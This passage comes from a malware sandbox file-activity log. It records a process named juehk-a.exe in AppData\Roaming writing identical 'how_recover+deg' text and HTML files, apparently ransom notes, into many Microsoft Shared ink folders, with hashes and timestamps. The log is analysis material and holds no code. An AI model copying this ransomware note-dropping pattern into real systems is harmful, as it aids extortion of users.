- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521117
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74578
- mode: created
- sequenceNumber: 1065
- value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521118
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74584
- mode: close
- sequenceNumber: 1066
- value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521118
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74590
- mode: created
- sequenceNumber: 1067
- value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521119
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74596
- mode: close
- sequenceNumber: 1068
- value: C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521119
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74618
- mode: created
- sequenceNumber: 1069
- value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521120
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74624
- mode: close
- sequenceNumber: 1070
- value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521120
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74631
- mode: created
- sequenceNumber: 1071
- value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521121
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74637
- mode: close
- sequenceNumber: 1072
- value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521121
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74644
- mode: created
- sequenceNumber: 1073
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521122
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74650
- mode: close
- sequenceNumber: 1074
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521122
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74657
- mode: created
- sequenceNumber: 1075
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521123
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74664
- mode: close
- sequenceNumber: 1076
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521123
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74671
- mode: failed
- sequenceNumber: 1077
- value: C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74679
- mode: created
- sequenceNumber: 1078
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521124
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74684
- mode: close
- sequenceNumber: 1079
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521124
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74705
- mode: created
- sequenceNumber: 1080
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521125
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74711
- mode: close
- sequenceNumber: 1081
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521125
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74885
- mode: created
- sequenceNumber: 1082
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521126
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74890
- mode: close
- sequenceNumber: 1083
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521126
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74899
- mode: created
- sequenceNumber: 1084
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521127
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74903
- mode: close
- sequenceNumber: 1085
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521127
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74911
- mode: created
- sequenceNumber: 1086
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521128
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74918
- mode: close
- sequenceNumber: 1087
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521128
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74978
- mode: created
- sequenceNumber: 1088
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521129
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74983
- mode: close
- sequenceNumber: 1089
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521129
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75025
- mode: created
- sequenceNumber: 1090
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521130
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75031
- mode: close
- sequenceNumber: 1091
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521130
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75036
- mode: created
- sequenceNumber: 1092
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521131
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75042
- mode: close
- sequenceNumber: 1093
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521131
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75069
- mode: created
- sequenceNumber: 1094
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521132
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75074
- mode: close
- sequenceNumber: 1095
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521132
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75085
- mode: created
- sequenceNumber: 1096
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521133
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75090
- mode: close
- sequenceNumber: 1097
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521133
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75100
- mode: created
- sequenceNumber: 1098
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521134
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75106
- mode: close
- sequenceNumber: 1099
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521134
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75115
- mode: created
- sequenceNumber: 1100
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521135
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75122
- mode: close
- sequenceNumber: 1101
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521135
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75131
- mode: created
- sequenceNumber: 1102
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231792
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75139
- mode: close
- sequenceNumber: 1103
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231792
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75290
- mode: created
- sequenceNumber: 1104
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521137
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75298
- mode: close
- sequenceNumber: 1105
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521137
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75305
- mode: created
- sequenceNumber: 1106
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2533274790477568
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75311
- mode: close
- sequenceNumber: 1107
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2533274790477568
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75317
- mode: created
- sequenceNumber: 1108
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521138
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75324
- mode: close
- sequenceNumber: 1109
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521138
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75330
- mode: created
- sequenceNumber: 1110
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521139
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75338
- mode: close
- sequenceNumber: 1111
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521139
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75408
- mode: created
- sequenceNumber: 1112
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521140
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75414
- mode: close
- sequenceNumber: 1113
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521140
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75423
- mode: created
- sequenceNumber: 1114
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521141
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75428
- mode: close
- sequenceNumber: 1115
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521141
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75441
- mode: created
- sequenceNumber: 1116
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521142
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75447
- mode: close
- sequenceNumber: 1117
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521142
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75453
- mode: created
- sequenceNumber: 1118
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521143
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75457
- mode: close
- sequenceNumber: 1119
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521143
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75471
- mode: created
- sequenceNumber: 1120
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942456
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75489
- mode: close
- sequenceNumber: 1121
- value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942456
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75494
- mode: created
- sequenceNumber: 1122
- value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521145
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75499
- mode: close
- sequenceNumber: 1123
- value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521145
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75504
- mode: created
- sequenceNumber: 1124
- value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521146
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75508
- mode: close
- sequenceNumber: 1125
- value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521146
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75513
- mode: created
- sequenceNumber: 1126
